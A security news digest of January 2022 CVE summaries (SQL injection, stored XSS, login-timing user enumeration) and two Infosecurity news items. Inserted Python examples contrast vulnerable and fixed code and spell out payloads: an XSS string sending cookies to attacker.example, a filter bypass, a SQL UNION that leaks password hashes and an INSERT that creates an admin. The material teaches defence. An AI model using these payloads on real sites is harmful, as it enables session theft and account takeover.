January 2022

CVE-2022-24264

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
Source: NIST
CVE-2022-24264

CVE-2022-24263

Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.
Source: NIST
CVE-2022-24263

CVE-2022-23872

Emlog pro v1.1.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /admin/configure.php via the parameter footer_info.
Source: NIST
CVE-2022-23872
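As an added illustration of the stored XSS class this entry describes (this is not Emlog's code; the settings store, template and payloads below are constructed for the example, and "footer_info" is used only because the advisory names that setting), the following shows a value saved once by an administrator being rendered unencoded into every page, why a blocklist filter is not a fix, and the output encoding that is:

```python
import html


class Settings:
    """Constructed stand-in for a CMS settings table (not Emlog code)."""

    def __init__(self):
        self._values = {}

    def save(self, key, value):
        # Store the raw string. Encoding belongs at output, in the context the
        # value is rendered into. A value saved once here is served to every
        # visitor of every page, which is what makes the XSS "stored".
        self._values[key] = value

    def get(self, key):
        return self._values.get(key, "")


# Constructed payload: closes the footer element and injects script.
FOOTER_PAYLOAD = (
    '</footer><script>new Image().src="https://attacker.example/?c="'
    "+document.cookie</script><footer>"
)

# Constructed payload that defeats a naive "remove <script>" blocklist:
# one pass of removal turns the inner fragment back into a <script> tag.
FILTER_BYPASS_PAYLOAD = "<scr<script>ipt>alert(document.domain)</script>"

TEMPLATE = "<html><body><main>Page body</main><footer>{footer}</footer></body></html>"


def render_vulnerable(settings):
    # Setting interpolated verbatim into HTML: a stored XSS sink.
    return TEMPLATE.format(footer=settings.get("footer_info"))


def render_with_blocklist(settings):
    # Blocklist filtering (same result whether done on save or on render):
    # still exploitable, see FILTER_BYPASS_PAYLOAD.
    cleaned = settings.get("footer_info").replace("<script>", "")
    return TEMPLATE.format(footer=cleaned)


def render_hardened(settings):
    # Output encoding for the HTML text context: whatever characters the
    # value contains, it can only ever be text inside <footer>.
    return TEMPLATE.format(footer=html.escape(settings.get("footer_info"), quote=True))


def has_script_tag(page):
    return "<script" in page.lower()


if __name__ == "__main__":
    s = Settings()
    s.save("footer_info", FOOTER_PAYLOAD)
    print("vulnerable:", render_vulnerable(s))
    print("hardened:  ", render_hardened(s))
    s.save("footer_info", FILTER_BYPASS_PAYLOAD)
    print("blocklist: ", render_with_blocklist(s))
```

The escaping is done with the standard library's html.escape at the point of output; a template engine with autoescaping enabled does the same job, and either way the fix is encoding for the rendering context rather than trying to recognise dangerous input.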

CVE-2022-24265

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the menu_filter parameter (reached with a request such as path=component/menu/&menu_filter=3).
Source: NIST
CVE-2022-24265

CVE-2022-21659

Flask-AppBuilder is an application development framework built on top of the Flask web framework. Affected versions contain a user enumeration vulnerability: an unauthenticated user can determine whether an account exists by measuring how long the server takes to respond to a login attempt. Users are advised to upgrade to version 3.4.4 as soon as possible. There are no known workarounds for this issue.
Source: NIST
CVE-2022-21659
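The mechanism this advisory describes is a login handler whose running time depends on whether the username exists. The following added example, written for this page and not Flask-AppBuilder's code or its actual fix, shows a leaky handler beside a constant-work one and measures the gap the way a remote attacker would; the PBKDF2 iteration count, the dummy credential and the usernames are assumptions:

```python
import hashlib
import hmac
import os
import secrets
import statistics
import time

# Assumed cost parameter for PBKDF2-HMAC-SHA256. The expensive verification
# is exactly what makes a skipped check measurable from across a network.
ITERATIONS = 100_000


def hash_password(password, salt, iterations=ITERATIONS):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


class UserStore:
    """Constructed in-memory user store; not Flask-AppBuilder code."""

    def __init__(self):
        self.users = {}
        self.hash_calls = 0  # instrumentation: expensive verifications performed
        # A dummy credential with the same cost parameters as real ones. It is
        # verified against whenever the username is unknown, so that path costs
        # the same as the wrong-password path.
        self._dummy_salt = os.urandom(16)
        self._dummy_hash = hash_password(secrets.token_urlsafe(16), self._dummy_salt)

    def add_user(self, username, password):
        salt = os.urandom(16)
        self.users[username] = (salt, hash_password(password, salt))

    def _verify(self, salt, stored, password):
        self.hash_calls += 1
        return hmac.compare_digest(hash_password(password, salt), stored)

    def login_leaky(self, username, password):
        record = self.users.get(username)
        if record is None:
            # Unknown user: no hashing at all, so the response comes back
            # tens of milliseconds sooner than for a known user. That gap is
            # the enumeration oracle.
            return False
        return self._verify(record[0], record[1], password)

    def login_constant_work(self, username, password):
        record = self.users.get(username)
        if record is None:
            # Spend the same PBKDF2 cost on the dummy credential, discard the
            # result, and fail exactly as a wrong password would.
            self._verify(self._dummy_salt, self._dummy_hash, password)
            return False
        return self._verify(record[0], record[1], password)


def timing_gap_ms(login, username_known, username_unknown, rounds=5):
    """Median wall-clock time (ms) per login attempt for a known and an
    unknown username, which is all a remote attacker can observe."""

    def median_ms(username):
        samples = []
        for _ in range(rounds):
            start = time.perf_counter()
            login(username, "wrong password")
            samples.append((time.perf_counter() - start) * 1000)
        return statistics.median(samples)

    return median_ms(username_known), median_ms(username_unknown)


if __name__ == "__main__":
    store = UserStore()
    store.add_user("alice", "correct horse battery staple")
    for name, fn in (("leaky", store.login_leaky), ("constant-work", store.login_constant_work)):
        known, unknown = timing_gap_ms(fn, "alice", "nobody")
        print(f"{name}: known user {known:.1f} ms, unknown user {unknown:.1f} ms")
```

Two caveats a reviewer would raise: the dummy credential must use the same algorithm and iteration count as real records, or the gap simply shrinks rather than closes; and constant work narrows the signal but does not remove the residual differences (lookup path, database round trip), so it belongs alongside rate limiting and a single generic failure message rather than instead of them.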

Cengage to Buy Cybersecurity Training platform, Infosec

A global education technology company based in Boston has signed a $191M deal to buy the cybersecurity training platform, Infosec.


Cengage Group announced the planned addition to its ed2Go business on Monday. The deal is expected to close in the first quarter of 2022. 


“The online, employer-paid cybersecurity training segment is currently a $1bn market, with expectations that it will grow to $10bn annually by 2027,” said Cengage CEO Michael Hansen. 


He added: “Combining Infosec with our already-successful Workforce Skills business will provide top-line growth, expand our base of recurring revenue and accelerate our opportunity within the space.”


Infosec was founded in 2004 by its current chief executive Jack Koziol who will remain at the helm to manage the transition. The company is based in Wisconsin and provides skills development and certification programs for the cybersecurity industry. 


“Cengage Group has the same level of passion for making learning accessible, affordable and applicable to today’s cybersecurity professionals,” said Jack Koziol, CEO and Founder of Infosec. 


He added: “Building on ed2go’s history in online training, Infosec will benefit from Cengage Group’s scale and expertise, which means we can reach more cybersecurity professionals and employers that are looking to not only grow their careers but to keep businesses, governments and people safe from cyber threats.”


Infosec employs around 100 people and offers more than 1,400 online cybersecurity courses. Nearly all Infosec’s current employees will reportedly be joining Cengage’s workforce of 4,500 people. 


According to Cyber Seek, there are just under 600,000 vacant cybersecurity roles in the United States. Research by Burning Glass Technologies suggests that around half of these positions require at least one certification. 


“We can’t hire people fast enough,” Hansen told The Boston Globe. “Right now, the demand for workforce skills courses is just exploding, and it’s exploding in very specific job categories,” he said. 


Hansen continued: “There is such a labor shortage. Every CEO tells me that…the labor shortage is really a skills shortage.”


News of Cengage’s planned purchase comes as rival British publishing house Pearson announced its acquisition of Credly, a digital workforce credentialing service provider, for around $200m.



Source: Infosecurity
Cengage to Buy Cybersecurity Training platform, Infosec

CVE-2021-46459

Victor CMS v1.0 was discovered to contain multiple SQL injection vulnerabilities in the component admin/users.php?source=add_user. These vulnerabilities can be exploited through a crafted POST request via the user_name, user_firstname, user_lastname, or user_email parameters.
Source: NIST
CVE-2021-46459
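The four SQL injection entries on this page (CVE-2022-24264 and CVE-2022-24265 in Cuppa CMS, CVE-2022-24263 in Hospital Management System, and this Victor CMS entry) describe the same defect: a request parameter spliced into a SQL string, in a search in the first three cases and in an INSERT behind an add-user form in the last. The following is an added illustration of that pattern and its fix, written for this page in Python against an in-memory SQLite table; it is not code from any of the affected projects, and the table layout, column names and payloads are constructed for the example:

```python
import sqlite3

# Constructed sample data standing in for a CMS user table. None of this is
# Cuppa CMS, Hospital Management System or Victor CMS code; the column names
# are assumptions chosen to echo the parameter names in the advisories.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "admin", "hash_alice"),
    ("bob", "bob@example.com", "editor", "hash_bob"),
    ("carol", "carol@example.com", "editor", "hash_carol"),
]

# Two constructed payloads. Each closes the attacker-controlled string literal
# and continues the statement with attacker-chosen SQL; neither needs a stacked
# query or a comment marker, so "one statement per call" does not help.
HASH_LEAK_PAYLOAD = "x%' UNION SELECT password_hash FROM users WHERE '%'='"
PRIVESC_PAYLOAD = "mallory', 'm@evil.example', 'admin', 'unset'), ('dummy"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_name TEXT, user_email TEXT, role TEXT, password_hash TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def search_vulnerable(conn, search_word):
    # The search term is spliced into the SQL text, so a quote in it ends the
    # literal and the rest of the term is parsed as SQL: here a UNION that
    # returns password hashes through a query meant to return user names.
    sql = f"SELECT user_name FROM users WHERE user_name LIKE '%{search_word}%'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, search_word):
    # The SQL text is fixed; the term is bound as a parameter and is only
    # ever compared as data, never parsed as SQL.
    sql = "SELECT user_name FROM users WHERE user_name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{search_word}%",))]


def add_user_vulnerable(conn, user_name, user_email):
    # Same flaw on an INSERT: the statement pins role='editor', but a crafted
    # user_name closes the VALUES tuple and adds a second row with an
    # attacker-chosen role.
    sql = (
        "INSERT INTO users (user_name, user_email, role, password_hash) "
        f"VALUES ('{user_name}', '{user_email}', 'editor', 'unset')"
    )
    conn.execute(sql)
    conn.commit()


def add_user_hardened(conn, user_name, user_email):
    sql = (
        "INSERT INTO users (user_name, user_email, role, password_hash) "
        "VALUES (?, ?, 'editor', 'unset')"
    )
    conn.execute(sql, (user_name, user_email))
    conn.commit()


def role_of(conn, user_name):
    row = conn.execute(
        "SELECT role FROM users WHERE user_name = ?", (user_name,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("normal search:", search_vulnerable(db, "bo"))
    print("leaked via search:", search_vulnerable(db, HASH_LEAK_PAYLOAD))
    print("same payload, bound parameter:", search_hardened(db, HASH_LEAK_PAYLOAD))
    add_user_vulnerable(db, PRIVESC_PAYLOAD, "anything@example.com")
    print("role of mallory after vulnerable insert:", role_of(db, "mallory"))
```

With the bound parameter the same payloads are stored or compared as the literal strings they are: the search returns nothing and the add-user call creates one editor whose user name happens to contain quotes. Escaping the input instead of binding it is the usual wrong turn here; it has to be right for every dialect and every context, whereas a placeholder is right by construction.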

Aussie Tech Entrepreneur Extradited Over SMS Fraud

A Russian-born tech entrepreneur has been extradited to the United States from Australia to face charges relating to a multi-million-dollar text messaging consumer fraud scheme.


The arrival in America of 41-year-old dual Russian and Australian citizen Eugeni Tsvetnenko was announced by the Federal Bureau of Investigation (FBI) on Friday. Tsvetnenko – also known as “Zhenya” – was extradited on charges of conspiracy to commit wire fraud, wire fraud, aggravated identity theft and conspiracy to commit money laundering.


Prosecutors allege that former Perth resident Tsvetnenko conspired with others to operate an auto-subscribing scheme that signed cell phone users up to receive premium, paid-for content via text message without their knowledge or consent. 


“Eugeni Tsvetnenko is alleged to have surreptitiously subscribed hundreds of thousands of cell phone users to a $9.99 per-month charge for recurring text messages they did not approve or want,” said US attorney Damian Williams.  


Victims of the scheme received text messages on horoscopes, celebrity gossip and trivia facts. The scheme’s operators defrauded victims of approximately $41,389,725 and made around $20m in profits. 


Tsvetnenko’s alleged co-conspirators include Darcy Wedd, the operator of telecommunications company Mobile Messenger, and Fraser Thompson, Mobile Messenger’s senior vice president of strategic operations. 


“Tsvetnenko and his co-conspirators concocted a scheme that turned thousands of mobile phone customers into unwitting subscription service participants, as alleged,” said FBI Assistant Director-in-Charge Michael J. Driscoll.


He added: “These customers incurred monthly charges for services they never subscribed to and, in many cases, disregarded as spam until the charges turned up on their monthly statements.”


Prosecutors allege that at the start of 2012, Wedd, Thompson and two other Mobile Messenger senior executives recruited Tsvetnenko to their auto-subscribing scheme to boost their company’s revenue. Tsvetnenko allegedly agreed and established two new content providers based in Australia, CF Enterprises and DigiMobi, to auto-subscribe on Mobile.


A co-conspirator referred to only as CC-3 allegedly provided Tsvetnenko with lists of phone numbers to target, along with instructions on how to auto-subscribe without being caught, by making it appear as if the customers had genuinely chosen to buy the text-messaging services.


Tsvetnenko is further accused of working with co-conspirators to launder the proceeds of the auto-subscribing scheme.



Source: Infosecurity
Aussie Tech Entrepreneur Extradited Over SMS Fraud